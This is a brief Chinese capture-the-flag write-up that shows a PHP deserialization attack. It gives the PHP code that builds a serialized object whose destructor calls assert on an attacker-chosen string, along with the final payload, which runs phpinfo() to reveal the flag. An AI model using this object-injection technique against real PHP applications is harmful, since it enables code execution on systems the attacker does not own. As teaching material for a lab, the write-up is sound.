目录扫描之后发现没有文件泄露。
查看一下源码发现了两个链接。
源码:
PHP魔术方法:magic
这里eval没有用了不知道为啥(可能被过滤了吧)。
这里用了assert截断函数(作用跟eval差不多,eval里面的语句要以;结尾)
这里用蚁剑连接会连不上,就先查看一下phpinfo的信息。
生成payload:
<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a ='phpinfo()';
$this->b ='assert';
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
echo serialize($c)
?>
payload:O:8:“HelloPhp”:2:{s:1:“a”;s:9:“phpinfo()”;s:1:“b”;s:6:“assert”;}
这里就发现flag了。